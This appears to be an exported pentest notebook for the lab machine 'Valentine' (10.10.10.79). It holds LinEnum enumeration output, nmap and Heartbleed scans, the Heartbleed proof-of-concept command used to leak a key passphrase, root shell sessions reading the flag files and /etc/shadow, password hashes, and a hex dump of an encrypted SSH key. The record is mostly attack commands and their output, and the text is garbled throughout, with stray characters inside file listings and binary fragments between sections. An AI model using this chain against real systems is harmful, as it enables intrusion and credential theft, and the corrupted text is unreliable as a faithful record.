2926 Apr 14 2012 umountroot -rwxr-xr-x 1 root root 1039 Nov 9 2011 unattended-upgrades -rwxr-xr-x 1 root root 1985 Apr 14 2012 urandom lrwxrwxrwx 1 root root 21 Dec 11 2017 whoopsie -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2666 Mar 22 2012 x11-common I [-] /etc/init/ config file permissions: total 332 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rw-r--r-- 1 root root 320 Dec 8 2011 acpid.conf -rw-r--r-- 1 root root 268 Apr 3 2012 alsa-restore.conf -rw-r--r-- 1 root root 267 Apr 3 2012 alsa-store.conf -rw-r--r-- 1 root root 278 Jun 20 2010 anacron.conf -rw-r--r-- 1 root root 1309 Apr 18 2012 apport.conf -rw-r--r-- 1 root root 261 Oct 25 2011 atd.conf -rw-r--r-- 1 root root 541 Oct 17 2011 avahi-daemon.conf -rw-r--r-- 1 root root 1009 Mar 7 2012 bluetooth.conf -rw-r--r-- 1 root root 266 Apr 16 2012 console.conf -rw-r--r-- 1 root root 509 Dec 21 2010 console-setup.conf -rw-r--r-- 1 root root 1122 Apr 16 2012 container-detect.conf -rw-r--r-- 1 root root 356 Apr 16 2012 control-alt-delete.conf -rw-r--r-- 1 root root 297 Apr 2 2012 cron.conf -rw-r--r-- 1 root root 1814 Apr 9 2012 cups.conf -rw-r--r-- 1 root root 510 Jan 1J0 2012 dbus.conf -rw-r--r-- 1 root root 273 Mar 30 2012 dmesg.conf -rw-r--r-- 1 root root 1377 Apr 16 2012 failsafe.conf -rw-r--r-- 1 root root 380 Aug 30 2011 failsafe-x.conf -rw-r--r-- 1 root root 267 Apr 16 2012 flush-early-job-log.conf -rw-r--r-- 1 root root 1247 Mar 14 2012 friendly-recovery.conf -rw-r--r-- 1 root root 317 May 26 2011 hostname.conf -rw-r--r-- 1 root root 557 Mar 29 2012 hwclock.conf -rw-r--r-- 1 root root 444 Mar 29 2012 hwclock-save.conf -rw-r--r-- 1 root root 131 Apr 6 2012 hybrid-gfx.conf -rw-r--r-- 1 root root 571 Feb 3 2012 irqbalance.conf -rw-r--r-- 1 root root 1413 Apr 19 2012 lightdm.conf -rw-r--r-- 1 root root 349 Mar 24 2012 modemmanager.conf -rw-r--r-- 1 root root 367 Mar 18 2011 module-init-tools.conf -rw-r--r-- 1 root root 943 Apr 12 2012 mountall.conf -rw-r--r-- 1 root root 349 Apr 12 2012 mountall-net.conf -rw-r--r-- 1 root root 261 Apr 12 2012 mountall-reboot.conf -rw-r--r-- 1 root root K 1201 Apr 12 2012 mountall-shell.conf -rw-r--r-- 1 root root 405 Apr 12 2012 mounted-debugfs.conf -rw-r--r-- 1 root root 550 Apr 12 2012 mounted-dev.conf -rw-r--r-- 1 root root 480 Apr 12 2012 mounted-proc.conf -rw-r--r-- 1 root root 610 Apr 12 2012 mounted-run.conf -rw-r--r-- 1 root root 1890 Apr 12 2012 mounted-tmp.conf -rw-r--r-- 1 root root 903 Apr 12 2012 mounted-var.conf -rw-r--r-- 1 root root 388 Apr 4 2012 networking.conf -rw-r--r-- 1 root root 803 Apr 4 2012 network-interface.conf -rw-r--r-- 1 root root 523 Apr 4 2012 network-interface-container.conf -rw-r--r-- 1 root root 1603 Apr 4 2012 network-interface-security.conf -rw-r--r-- 1 root root 543 Apr 12 2012 network-manager.conf -rw-r--r-- 1 root root 971 Nov 9 2011 plymouth.conf -rw-r--r-- 1 root root 326 Mar 26 2010 plymouth-log.conf -rw-r--r-- 1 root root 899 Mar 18 2011 plymouth-splash.conf -rw-r--r-- 1 root root 800 Apr 13 2012 plymouth-stop.conf -rw-r--r-- 1 roLot root 367 Jan 25 2011 plymouth-upstart-bridge.conf -rw-r--r-- 1 root root 363 Dec 5 2011 procps.conf -rw-r--r-- 1 root root 454 Apr 16 2012 rc.conf -rw-r--r-- 1 root root 705 Apr 16 2012 rcS.conf -rw-r--r-- 1 root root 1543 Apr 16 2012 rc-sysinit.conf -rw-r--r-- 1 root root 457 Mar 29 2012 resolvconf.conf -rw-r--r-- 1 root root 597 Mar 22 2012 rfkill-restore.conf -rw-r--r-- 1 root root 469 Mar 22 2012 rfkill-store.conf -rw-r--r-- 1 root root 426 Mar 30 2012 rsyslog.conf -rw-r--r-- 1 root root 230 Mar 18 2011 setvtrgb.conf -rw-r--r-- 1 root root 277 Apr 16 2012 shutdown.conf -rw-r--r-- 1 root root 667 Mar 26 2013 ssh.conf -rw-r--r-- 1 root root 348 Apr 16 2012 tty1.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty2.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty3.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty4.conf -rw-r--r-- 1 root root 232 Apr 16 2012 tty5.conf -rw-r--r-- 1 root root 232 Apr 16 2012 tty6.conf -rw-r--Mr-- 1 root root 322 Dec 16 2011 udev.conf -rw-r--r-- 1 root root 637 Apr 4 2012 udev-fallback-graphics.conf -rw-r--r-- 1 root root 769 Aug 22 2011 udev-finish.conf -rw-r--r-- 1 root root 356 Sep 29 2011 udevmonitor.conf -rw-r--r-- 1 root root 352 Apr 4 2012 udevtrigger.conf -rw-r--r-- 1 root root 473 Apr 5 2012 ufw.conf -rw-r--r-- 1 root root 329 Apr 16 2012 upstart-socket-bridge.conf -rw-r--r-- 1 root root 553 Apr 16 2012 upstart-udev-bridge.conf -rw-r--r-- 1 root root 889 Feb 3 2012 ureadahead.conf -rw-r--r-- 1 root root 683 Feb 3 2012 ureadahead-other.conf -r--r--r-- 1 root root 901 Dec 11 2017 vmware-tools.conf -rw-r--r-- 1 root root 351 Dec 11 2017 vmware-tools-thinprint.conf -rw-r--r-- 1 root root 1481 Apr 16 2012 wait-for-state.conf -rw-r--r-- 1 root root 362 Apr 18 2012 whoopsie.conf [-] /lib/systemd/* config file permissions: /lib/systemd/: total 4.0K drwxr-xr-x 9 root root 4.0K Apr 25 2012 system /lib/systNemd/system: total 112K drwxr-xr-x 2 root root 4.0K Apr 25 2012 basic.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 halt.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 reboot.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 dbus.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 sockets.target.wants -rw-r--r-- 1 root root 133 Apr 13 2012 upower.service -rw-r--r-- 1 root root 137 Apr 12 2012 udisks.service -rw-r--r-- 1 root root 164 Apr 5 2012 udev-control.socket -rw-r--r-- 1 root root 177 Apr 5 2012 udev-kernel.socket -rw-r--r-- 1 root root 341 Apr 5 2012 udev.service -rw-r--r-- 1 root root 752 Apr 5 2012 udev-settle.service -rw-r--r-- 1 root root 291 Apr 5 2012 udev-trigger.service -rw-r--r-- 1 root root 231 Mar 30 2012 rsyslog.service -rw-r--r-- 1 root root 433 Mar 27 2012 accounts-daemon.service -rw-r--r-- 1 root root 189 Mar 21 O2012 bluetooth.service -rw-r--r-- 1 root root 432 Feb 25 2012 console-kit-daemon.service -rw-r--r-- 1 root root 219 Feb 25 2012 console-kit-log-system-restart.service -rw-r--r-- 1 root root 201 Feb 25 2012 console-kit-log-system-start.service -rw-r--r-- 1 root root 218 Feb 25 2012 console-kit-log-system-stop.service -rw-r--r-- 1 root root 419 Feb 22 2012 dbus.service -rw-r--r-- 1 root root 106 Feb 22 2012 dbus.socket -rw-r--r-- 1 root root 471 Feb 13 2012 colord.service -rw-r--r-- 1 root root 1.1K Dec 17 2011 avahi-daemon.service -rw-r--r-- 1 root root 874 Dec 17 2011 avahi-daemon.socket -rw-r--r-- 1 root root 188 Nov 8 2011 rsync.service -rw-r--r-- 1 root root 953 Oct 24 2011 rtkit-daemon.service /lib/systemd/system/basic.target.wants: total 0 lrwxrwxrwx 1 root root 39 Dec 11 2017 console-kit-log-system-start.service -> ../console-kit-log-system-start.service lrwxrwxrwx 1 root root 15 Dec 11 2017 udev.service -> ../udev.service lrwxrwxrwx 1 root root 23 Dec 11 2017 udev-trPigger.service -> ../udev-trigger.service /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 38 Dec 11 2017 console-kit-log-system-stop.service -> ../console-kit-log-system-stop.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 38 Dec 11 2017 console-kit-log-system-stop.service -> ../console-kit-log-system-stop.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 41 Dec 11 2017 console-kit-log-system-restart.service -> ../console-kit-log-system-restart.service /lib/systemd/system/dbus.target.wants: total 0 lrwxrwxrwx 1 root root 14 Dec 11 2017 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Dec 11 2017 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 14 Dec 11 2017 dbus.socket -> ../dbus.socket lrwxrwxrwx 1 root root 22 Dec 11 2017 udev-control.socket -> ../udev-control.socket lQrwxrwxrwx 1 root root 21 Dec 11 2017 udev-kernel.socket -> ../udev-kernel.socket ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.3p1 [-] Apache version: Server version: Apache/2.2.22 (Ubuntu) Server built: Jul 15 2016 15:32:34 [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Loaded Modules: core_module (static) log_config_module (static) logio_module (static) mpm_prefork_module (static) http_module (static) so_module (static) alias_module (shared) auth_basic_module (shared) authn_file_module (shared) authz_default_module (shared) authz_groupfile_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) cgi_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) mime_module (shared) negotiation_module (shared) php5_module (shared) reqtimeoRut_module (shared) setenvif_module (shared) ssl_module (shared) status_module (shared) [-] www home dir contents: /var/www/: total 176K drwxr-xr-x 3 root root 4.0K Dec 13 2017 . drwxr-xr-x 14 root root 4.0K Feb 6 2018 .. -rw-r--r-- 1 root root 760 Feb 5 2018 decode.php drwxr-xr-x 2 root root 4.0K Dec 13 2017 dev -rw-r--r-- 1 root root 739 Feb 5 2018 encode.php -rw-r--r-- 1 root root 38 Dec 12 2017 index.php -rw-rw-r-- 1 hype hype 150K Dec 12 2017 omg.jpg /var/www/dev: total 20K drwxr-xr-x 2 root root 4.0K Dec 13 2017 . drwxr-xr-x 3 root root 4.0K Dec 13 2017 .. -rw-r--r-- 1 root root 5.3K Dec 13 2017 hype_key -rw-r--r-- 1 root root 227 Feb 5 2018 notes.txt ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc /usr/bin/curl [-] Installed compilers: ii gcc 4:4.6.3-1ubuntu5 GNU C compilSer ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler ii libprotoc7 2.4.1-1ubuntu2 protocol buffers compiler library ii protobuf-compiler 2.4.1-1ubuntu2 compiler for protocol buffer definition files [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1711 Dec 11 2017 /etc/passwd -rw-r--r-- 1 root root 850 Feb 6 2018 /etc/group -rw-r--r-- 1 root root 665 Apr 25 2012 /etc/profile -rw-r----- 1 root shadow 1164 Feb 6 2018 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 36832 Apr 8 2012 /bin/su -rwsr-xr-x 1 root root 31304 Mar 2 2012 /bin/fusermount -rwsr-xr-x 1 root root 69096 Mar 29 2012 /bin/umount -rwsr-xr-x 1 root root 35712 Nov 8 2011 /bin/ping -rwsr-xr-x 1 root root 40256 Nov 8 2011 /bin/ping6 -rwsr-xr-x 1 root root 94792 Mar 29 2012 /bin/mount -rwsr-xr-- 1 root messagebus 292944 Feb 22 2012 /usr/liTb/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10592 Apr 19 2012 /usr/lib/pt_chown -r-sr-xr-x 1 root root 14320 Dec 11 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper -r-sr-xr-x 1 root root 9532 Dec 11 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper -rwsr-xr-x 1 root root 14696 Jan 6 2012 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 10408 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 240984 Aug 11 2016 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 23184 Jan 6 2012 /usr/bin/pkexec -rwsr-xr-x 1 root root 71248 Jan 31 2012 /usr/bin/sudoedit -rwsr-sr-x 1 root root 10184 Mar 22 2012 /usr/bin/X -rwsr-xr-x 1 root root 32352 Apr 8 2012 /usr/bin/newgrp -rwsr-xr-x 1 root lpadmin 14688 Apr 9 2012 /usr/bin/lppasswd -rwsr-xr-x 1 root root 62400 Jul 28 2011 /usr/bin/mtr -rwsr-xr-x 1 root root 37096 Apr 8 2012 /usr/bin/chsh -rwsr-xr-x 1 root root 18808 Nov 8 2011 /usr/bin/arping -rwsr-xr-x 1 root root 42824 Apr 8 201U2 /usr/bin/passwd -rwsr-xr-x 1 root root 71248 Jan 31 2012 /usr/bin/sudo -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwsr-xr-x 1 root root 41832 Apr 8 2012 /usr/bin/chfn -rwsr-xr-x 1 root root 18912 Nov 8 2011 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 63848 Apr 8 2012 /usr/bin/gpasswd -rwsr-sr-x 1 libuuid libuuid 18856 Mar 29 2012 /usr/sbin/uuidd -rwsr-xr-- 1 root dip 325744 Feb 4 2011 /usr/sbin/pppd [-] SGID files: -rwxr-sr-x 1 root utmp 10096 Apr 30 2011 /usr/lib/utempter/utempter -rwxr-sr-x 1 root utmp 14864 Apr 16 2012 /usr/lib/libvte-2.90-9/gnome-pty-helper -rwxr-sr-x 1 root mail 14664 Mar 30 2012 /usr/lib/evolution/camel-lock-helper-1.2 -rwsr-sr-x 1 root root 10184 Mar 22 2012 /usr/bin/X -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-lock -rwxr-sr-x 1 root mail 14800 Oct 17 2011 /usr/bin/dotlockfile -rwxr-sr-x 1 root mlocate 39472 Aug 17 2011 /usr/bin/mlocate -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-touchlock -rwxr-sr-x V1 root ssh 129104 Aug 11 2016 /usr/bin/ssh-agent -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwxr-sr-x 1 root crontab 35896 Apr 2 2012 /usr/bin/crontab -rwxr-sr-x 1 root tty 14648 Mar 31 2012 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 23168 Apr 8 2012 /usr/bin/expiry -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-unlock -rwxr-sr-x 1 root tty 18976 Mar 29 2012 /usr/bin/wall -rwxr-sr-x 1 root shadow 50760 Apr 8 2012 /usr/bin/chage -rwsr-sr-x 1 libuuid libuuid 18856 Mar 29 2012 /usr/sbin/uuidd -rwxr-sr-x 1 root games 132624 Apr 17 2012 /usr/games/gnomine -rwxr-sr-x 1 root games 149016 Apr 17 2012 /usr/games/mahjongg -rwxr-sr-x 1 root shadow 35432 Feb 8 2012 /sbin/unix_chkpwd [+] Files with POSIX capabilities set: /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep [+] Private SSH keys found!: /home/hype/.ssh/id_rsa /home/hype/Desktop/LinEnum.sh [+] AWS secret keys found!: /home/hype/Desktop/LinEnum.sh [-] NFS displayingW partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> proc /proc proc nodev,noexec,nosuid 0 0 # / was on /dev/sda1 during installation UUID=95d83c75-2be1-4714-bd77-fed615f4b5d9 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation UUID=3281446a-d6dc-4ffa-b85a-1e852a310dd7 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered X [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 91 Dec 11 2017 /etc/kernel-img.conf -rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf -rw-r--r-- 1 root root 6961 Apr 25 2012 /etc/ca-certificates.conf -rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf -rw-r--r-- 1 root root 333 Dec 11 2017 /etc/updatedb.conf -rw-r--r-- 1 root root 34 Apr 25 2012 /etc/ld.so.conf -rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf -rw-r--r-- 1 root root 624 May 16 2010 /etc/mtools.conf -rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf -rw-r--r-- 1 root root 112 Jun 22 2007 /etc/apg.conf -rw-r--r-- 1 root root 10333 Feb 21 2012 /etc/sensors3.conf -rw-r--r-- 1 root root 1309 Apr 18 2012 /etc/kerneloops.conf -rw-r--r-- 1 root root 7649 Apr 25 2012 /etc/pnm2ppa.conf -rw-r--r-- 1 root root 2064 Nov 23 2006 /etc/netscsid.conf -rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf -rw-r--r-- 1 root root 2Y083 Dec 5 2011 /etc/sysctl.conf -rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf -rw-r--r-- 1 root root 350 Dec 11 2017 /etc/popularity-contest.conf -rw-r--r-- 1 root root 4728 Mar 24 2012 /etc/hdparm.conf -rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf -rw-r--r-- 1 root root 19925 Apr 10 2012 /etc/brltty.conf -rw-r--r-- 1 root root 1343 Jan 9 2007 /etc/wodim.conf -rw-r--r-- 1 root root 699 Feb 13 2012 /etc/colord.conf -rw-r--r-- 1 root root 513 Apr 25 2012 /etc/nsswitch.conf -rw-r--r-- 1 root root 1309 Aug 27 14:11 /etc/tpvmlp.conf -rw-r--r-- 1 root root 1263 Mar 30 2012 /etc/rsyslog.conf -rw-r--r-- 1 root root 2981 Apr 25 2012 /etc/adduser.conf -rw-r--r-- 1 root root 572 Mar 7 2012 /etc/usb_modeswitch.conf -rw-r--r-- 1 root root 3343 Apr 19 2012 /etc/gai.conf -rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf -rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf -rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf -rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf [-] Current user's history files: -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/hype/.bash_history exit exot exit ls -la cd / ls -la cd .devs ls -la tmux -L dev_sess tmux a -t dev_sess tmux --help tmux -S /.devs/dev_sess exit [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root root 1711 Dec 11 2017 /var/backups/passwd.bak -rw------- 1 root root 850 Feb 6 2018 /var/backups/group.bak -rw------- 1 root shadow 702 Feb 6 2018 /var/backups/gshadow.bak -rw------- 1 root shadow 1164 Feb 6 2018 /var/backups/shadow.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Apr 25 2012 . drwxr-xr-x 14 root root 4096 Feb 6 2018 .. ### SCAN COMPLETE ####################################custom-colorsXAIZ|xA ff: fe80::250:56ff:feb9:d009/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:601948 errors:0 dropped:0 overruns:0 frame:0 TX packets:421182 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:100145335 (100.1 MB) TX bytes:101149967 (101.1 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:928 errors:0 dropped:0 overruns:0 frame:0 TX packets:928 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:181376 (181.3 KB) TX bytes:181376 (181.3 KB) root@Valentine:/home/hype/Desktop# cat /home/hype/Desktop/user.txt e6710a5464769fd5fcd216e076961750 root@Valentine:/home/hype/Desktop# cat /root/root.txt f1bb6d759df1f272914ebbc9ed7765b2 root@Valentine:/home/hype/Desktop# custom-colors$A _y">Process List root 992 0.0 0.0 19976 976 tty4 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty4 root 1001 0.0 0.0 19976 972 tty5 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty5 root 1005 0.0 0.1 26416 1676 ? Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< root 1009 0.0 0.4 20652 4584 pts/13 Ss+ 14:11 0:00 -bash root 1018 0.0 0.0 19976 968 tty2 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty2 root 1021 0.0 0.0 19976 976 tty3 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty3custom-colors$A ;d:7::: games:*:15455:0:99999:7::: man:*:15455:0:99999:7::: lp:*:15455:0:99999:7::: mail:*:15455:0:99999:7::: news:*:15455:0:99999:7::: uucp:*:15455:0:99999:7::: proxy:*:15455:0:99999:7::: www-data:*:15455:0:99999:7::: backup:*:15455:0:99999:7::: list:*:15455:0:99999:7::: irc:*:15455:0:99999:7::: gnats:*:15455:0:99999:7::: nobody:*:15455:0:99999:7::: libuuid:!:15455:0:99999:7::: syslog:*:15455:0:99999:7::: messagebus:*:15455:0:99999:7::: colord:*:15455:0:99999:7::: lightdm:*:15455:0:99999:7::: whoopsie:*:15455:0:99999:7::: avahi-autoipd:*:15455:0:99999:7::: avahi:*:15455:0:99999:7::: usbmux:*:15455:0:99999:7::: kernoops:*:15455:0:99999:7::: pulse:*:15455:0:99999:7::: rtkit:*:15455:0:99999:7::: speech-dispatcher:!:15455:0:99999:7::: hplip:*:15455:0:99999:7::: saned:*:15455:0:99999:7::: hype:$6$vKbykTIV$OCrqMLxv1QcjfhtGMyzzEfhevoTe7sO.v3o1SL3S6wCDc0pXsZvrayn/Wy.TEQuCJWsKLXUh7LakSgTnN/496/:17568:0:99999:7::: sshd:*:17511:0:99999:7::: root@Valentine:/home/hype/Desktop# custom-colors$A o+ [x!;' 10.10.10.79 - Valentinecustom-colorsA4h  ' Log Bookcustom-colors(AI^ɚ(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree hype_key passphrase heartbleedbelievethehype custom-colors$A Z u'   Hashesroot@Valentine:/home/hype/Desktop# cat /root/root.txt f1bb6d759df1f272914ebbc9ed7765b2 root@Valentine:/home/hype/Desktop# cat /etc/shadow root:$6$ZC6nSRoi$CLMvXwpiQymsSLYvvF69IpKR8eZkGdZCBokSCTwaUM0x/AfdcSGCSHHFEcam6jyYurcrlXxeSmXkjUlBnXTN2.:17568:0:99999:7::: daemon:*:15455:0:99999:7::: bin:*:15455:0:99999:7::: sys:*:15455:0:99999:7::: sync:*:15455:0:99999\g'  Goodiescustom-colorsVA?& c`e 10.10.10.79 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:16 EDT Nmap scan report for 10.10.10.79 Host is up (0.060s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Not valid before: 2018-02-06T00:a45:25 |_Not valid after: 2019-02-06T00:45:25 |_ssl-date: 2020-08-27T21:21:48+00:00; +2m44s from scanner time. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 2m43s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 169.08 seconds $ nmap -p443 --script ssl-heartbleed -oA ./ValHeart 10.10.10.79 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:23 EDT Nmap scan report for 10.10.10.79 Host is up (0.076s latency). PORT STATE SERVICE 443/tcp open https | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://www.openssl.org/news/secadv_20140407.txt | http://cvedetails.com/cve/2014-0160/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Nmap done: 1 IP address (1 host up) scanned in 1.12 secondscustom-colors*A UvLeak Exploit POC: https://github.com/sensepost/heartbleed-poc Description: OpenSSL memory leak vulnerability Discovery of Vulnerability nmap ssl-heartbleed script Exploit Code Used sudo python heartbleed-poc.py 10.10.10.79 443 -f /home/kali/Desktop/Valentine/heartpoc.bin -n 35 Strings heartpoc.bin revealed $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== $ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d heartbleedbelievethehype Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A bYd6 0d 0a 0d 0a 44 62 50 72 4f 37 38 6b 65 67 4e 75 6b 31 44 41 71 6c 41 4e 35 6a 62 6a 58 76 30 50 50 73 6f 67 33 6a 64 62 4d 46 53 38 69 45 39 70 33 55 4f 4c 30 6c 46 30 78 66 37 50 7a 6d 72 6b 44 61 38 52 0d 0a 35 79 2f 62 34 36 2b 39 6e 45 70 43 4d 66 54 50 68 4e 75 4a 52 63 57 32 55 32 67 4a 63 4f 46 48 2b 39 52 4a 44 42 43 35 55 4a 4d 55 53 31 2f 67 6a 42 2f 37 2f 4d 79 30 30 4d 77 78 2b 61 49 36 0d 0a 30 45 49 30 53 62 4f 59 55 41 56 31 57 34 45 56 37 6d 39 36 51 73 5a 6a 72 77 4a 76 6e 6a 56 61 66 6d 36 56 73 4b 61 54 50 42 48 70 75 67 63 41 53 76 4d 71 7a 37 36 57 36 61 62 52 5a 65 58 69 0d 0a 45 62 77 36 36 68 6a 46 6d 41 75 34 41 7a 71 63 4d 2f 6b 69 67 4e 52 46 50 59 75 4e 69 58 72 58 73 31 77 2f 64 65 4c 43 71 43 4a 2b 45 61 31 54 38 7a 6c 61 73 36 66 63 6d 68 4d 38 41 2b 38 50 0d 0a 4f 58 42 4b 4e 65 36 6c 31 37 68 4b 61 54 36 77 46 6e 70 35 65 58 4f 61 55 49 48 76 48 6e 76 4f 36 53 63 48 56 57 52 72 5a 37 30 66 63 70 63 70 69 6d 4c 31 77 31 33 54 67 64 64 32 41 69 47 64 0d 0a 70 48 4c 4a 70 5e9 55 49 49 35 50 75 4f 36 78 2b 4c 53 38 6e 31 72 2f 47 57 4d 71 53 4f 45 69 6d 4e 52 44 31 6a 2f 35 39 2f 34 75 33 52 4f 72 54 43 4b 65 6f 39 44 73 54 52 71 73 32 6b 31 53 48 0d 0a 51 64 57 77 46 77 61 58 62 59 79 54 31 75 78 41 4d 53 6c 35 48 71 39 4f 44 35 48 4a 38 47 30 52 36 4a 49 35 52 76 43 4e 55 51 6a 77 78 30 46 49 54 6a 6a 4d 6a 6e 4c 49 70 78 6a 76 66 71 2b 45 0d 0a 70 30 67 44 30 55 63 79 6c 4b 6d 36 72 43 5a 71 61 63 77 6e 53 64 64 48 57 38 57 33 4c 78 4a 6d 43 78 64 78 57 35 6c 74 35 64 50 6a 41 6b 42 59 52 55 6e 6c 39 31 45 53 43 69 44 34 5a 2b 75 43 0d 0a 4f 6c 36 6a 4c 46 44 32 6b 61 4f 4c 66 75 79 65 65 30 66 59 43 62 37 47 54 71 4f 65 37 45 6d 4d 42 33 66 47 49 77 53 64 57 38 4f 43 38 4e 57 54 6b 77 70 6a 63 30 45 4c 62 6c 55 61 36 75 6c 4f 0d 0a 74 39 67 72 53 6f 73 52 54 43 73 5a 64 31 34 4f 50 74 73 34 62 4c 73 70 4b 78 4d 4d 4f 73 67 6e 4b 6c 6f 58 76 6e 6c 50 4f 53 77 53 70 57 79 